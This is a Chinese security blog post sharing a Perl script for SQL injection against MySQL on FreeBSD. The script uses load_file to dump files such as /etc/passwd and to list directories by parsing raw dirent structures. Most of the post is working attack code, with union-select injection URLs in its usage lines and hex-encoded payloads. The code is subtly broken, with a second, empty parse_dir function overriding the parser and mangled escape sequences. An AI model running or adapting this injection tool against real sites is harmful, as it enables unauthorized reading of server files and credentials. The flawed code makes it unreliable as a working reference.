SQL注射中使用Mysql load_file解析bsd目录的脚本 's

admin 2017年5月8日05:18:34评论456 views字数 3614阅读12分2秒阅读模式

作者:xi4oyu可能不少x客都知道mysql load_file能够读取文件的内容。但是在bsd平台上,load_file也能够以文件的方式读取目录内容的前512个字节。


可能不少x客都知道mysql load_file能够读取文件的内容。但是在bsd平台上,load_file也能够以文件的方式读取目录内容的前512个字节。

[email protected]:~$ perl dump_bsd_dir.pl
dump_bsd_dir : List freebsd DIRS USE load_file with MYSQL
By xi4oyu evil.xi4oyu#gmail.com


usage: dump_bsd_dir.pl [options]
-u : Inject url
-d|-f : DIR/FILE to list
Ext: dump_bsd_dir.pl -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,FUCKBSD,3 -d /etc
dump_bsd_dir.pl -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,FUCKBSD,3 -f /etc/passwd

#!/usr/bin/perl use LWP::UserAgent; use strict; use Getopt::Std; use vars qw / %opt /;  use constant True => 1;  my $rep_word = "FUCKBSD"; my $sep_flag = "%!!"; my $user_agent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;.NET CLR 1.1.4122)"; my $target = ''; my $target_rep = ''; my $dir = ''; my $file = '';  sub usage{  print STDERR <<"EOF"; dump_bsd_dir : List freebsd DIRS USE load_file with MYSQL By xi4oyu evil.xi4oyu#gmail.com http://www.pentestday.com  usage: $0 [options] -u : Inject url -d|-f   : DIR/FILE to list Ext: $0 -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,FUCKBSD,3 -d /etc      $0 -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,FUCKBSD,3 -f /etc/passwd  EOF  exit;  }  sub hex_str{  my $hex_str = shift;  my $hexed_str = "0x";  $hexed_str .= unpack("H*",$hex_str);  return $hexed_str;  }  #This function parsed freebsd dirent struct and print out result  =pod  src/sys/sys/dirent.h  Ref:http://fxr.watson.org/fxr/source/sys/dirent.h?v=FREEBSD7    49    50 struct dirent {    51         __uint32_t d_fileno;            /* file number of entry */    52         __uint16_t d_reclen;            /* length of this record */    53         __uint8_t  d_type;              /* file type, see below */    54         __uint8_t  d_namlen;            /* length of string in d_name */    55 #if __BSD_VISIBLE    56 #define MAXNAMLEN       255    57         char    d_name[MAXNAMLEN + 1];  /* name must be no longer than this */    58 #else    59         char    d_name[255 + 1];        /* name must be no longer than this */    60 #endif    61 };    62    63 #if __BSD_VISIBLE    64 /*    65  * File types    66  */    67 #define DT_UNKNOWN       0    68 #define DT_FIFO          1    69 #define DT_CHR           2    70 #define DT_DIR           4    71 #define DT_BLK           6    72 #define DT_REG           8    73 #define DT_LNK          10    74 #define DT_SOCK         12    75 #define DT_WHT          14  =cut  sub parse_dir{   my $dirent_hex = shift;  #skip 48  my $dir = substr($dirent_hex,48);  my $ent_len = 9;  my $index = 0;   while( True ){    my $header = substr($dir,$index,16);   my ($inode,$ent_len,$ent_type,$name_len) = unpack("LSCC",pack("H*",$header));   last if $ent_len == 0;   my $name = substr($dir,$index+16,$name_len * 2);   my $str_name = unpack("a*",pack("H*",$name));   my $type = "file:";   if($ent_type == 4){    $type = "dir:";    $str_name .= "/";    }elsif($ent_type == 10){    $type = "link:";    }elsif($ent_type == 1){    $type = "fifo:";   }elsif($ent_type == 12){    $type = "socket:";   }elsif($ent_type == 6){    $type = "blk:";   }   print "$type/t$str_name/n";    $index += 2* $ent_len;   }  }  sub get_that_shit{  my $hexed_str = shift;  my $url = $target;  $url =~ s/$rep_word/$hexed_str/g;   #print $url;  my $ua = LWP::UserAgent->new;          $ua->agent("$user_agent");          my $req = HTTP::Request->new(GET => "$url");         my $rest = $ua->request($req);  my $content = $rest->content;  #print $content;  my $ret = "ERROR";  #print $sep_flag;  if( $content =~ /$sep_flag(.*)$sep_flag/sg){   $ret = $1;  }  return $ret;  }  sub parse_dir{   my $hex_code = shift;  }  #================================================================# #Here We Go!  my $opt_string = "u:d:f:";  usage if $#ARGV < 0;  getopts("$opt_string",/%opt) or usage(); usage if $opt{h};   $target = $opt{u} if $opt{u}; $dir = $opt{d} if $opt{d}; $file = $opt{f} if $opt{f};  if(!$target || (!$dir && !$file)){  usage(); }  my $hexed_str = "";  my $sep_flag_hex = hex_str($sep_flag); if($dir){   $hexed_str = "hex(concat($sep_flag_hex,load_file(".hex_str($dir)."),$sep_flag_hex))"; }else{    $hexed_str = "concat($sep_flag_hex,load_file(".hex_str($file)."),$sep_flag_hex)"; }  #print $hexed_str."/n"; my $ret_str = get_that_shit($hexed_str);   if($file){   print $ret_str;  }else{  parse_dir($ret_str);  }


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  • 本文由 发表于 2017年5月8日05:18:34
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                   SQL注射中使用Mysql load_file解析bsd目录的脚本 'shttps://cn-sec.com/archives/45043.html


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